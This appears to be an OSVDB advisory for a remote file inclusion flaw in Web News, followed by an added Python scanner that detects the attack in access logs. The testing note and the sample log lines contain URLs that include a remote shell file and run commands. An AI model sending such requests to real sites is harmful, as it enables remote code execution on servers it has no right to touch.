Web News index.php config[root_ordner] Variable Remote File Inclusion

2007-08-09T00:00:00
ID OSVDB:36427
Type osvdb
Reporter Rizgar()
Modified 2007-08-09T00:00:00

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/index.php?config[root_ordner]=http://[attacker]/shell.txt?&cmd=id
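A defender-side check for this request pattern in web server access logs, added here as an example and not part of the original advisory: it flags requests whose config[root_ordner] query parameter carries a URL instead of a local path. The log lines, addresses and host names are constructed, and flagging any value that begins with a URI scheme is an assumption about what to treat as suspicious.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter name taken from the advisory.
PARAM = "config[root_ordner]"
# Assumption: a value starting with a URI scheme (two or more characters, so
# Windows drive letters such as C: are not matched) is not a local path.
URI_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]+:", re.I)
# Request field of a common/combined log format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation address ranges, .example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Aug/2007:10:00:01 +0000] "GET /index.php?id=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Aug/2007:10:00:05 +0000] "GET /index.php?config[root_ordner]=http://files.example/shell.txt?&cmd=id HTTP/1.1" 200 312',
    '198.51.100.7 - - [09/Aug/2007:10:00:09 +0000] "GET /index.php?config%5Broot_ordner%5D=hTTp%3A%2F%2Ffiles.example%2Fa.txt%3F HTTP/1.1" 200 298',
    '203.0.113.4 - - [09/Aug/2007:10:01:00 +0000] "GET /index.php?config[root_ordner]=/var/www/news/ HTTP/1.1" 200 5120',
]

def suspicious_values(target):
    """Return config[root_ordner] values in a request target that look like URLs."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode a second time so double-encoded
        # requests are flagged as well.
        name, value = unquote(name), unquote(value)
        if name == PARAM and URI_SCHEME.match(value):
            hits.append(value)
    return hits

def scan(lines):
    """Return (line_number, client_address, value) for each flagged log line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        for value in suspicious_values(match.group(1)):
            findings.append((number, client, value))
    return findings

if __name__ == "__main__":
    for number, client, value in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent {PARAM}={value}")
```

Access logs normally record only the query string, so the same variable supplied in a POST body or cookie, both of which register_globals also imports, will not show up in this scan.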

References:

Secunia Advisory ID: 26398
Related OSVDB ID: 36428
Related OSVDB ID: 36429
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0114.html
ISS X-Force ID: 35925
FrSIRT Advisory: ADV-2007-2839
CVE-2007-4329
Bugtraq ID: 25257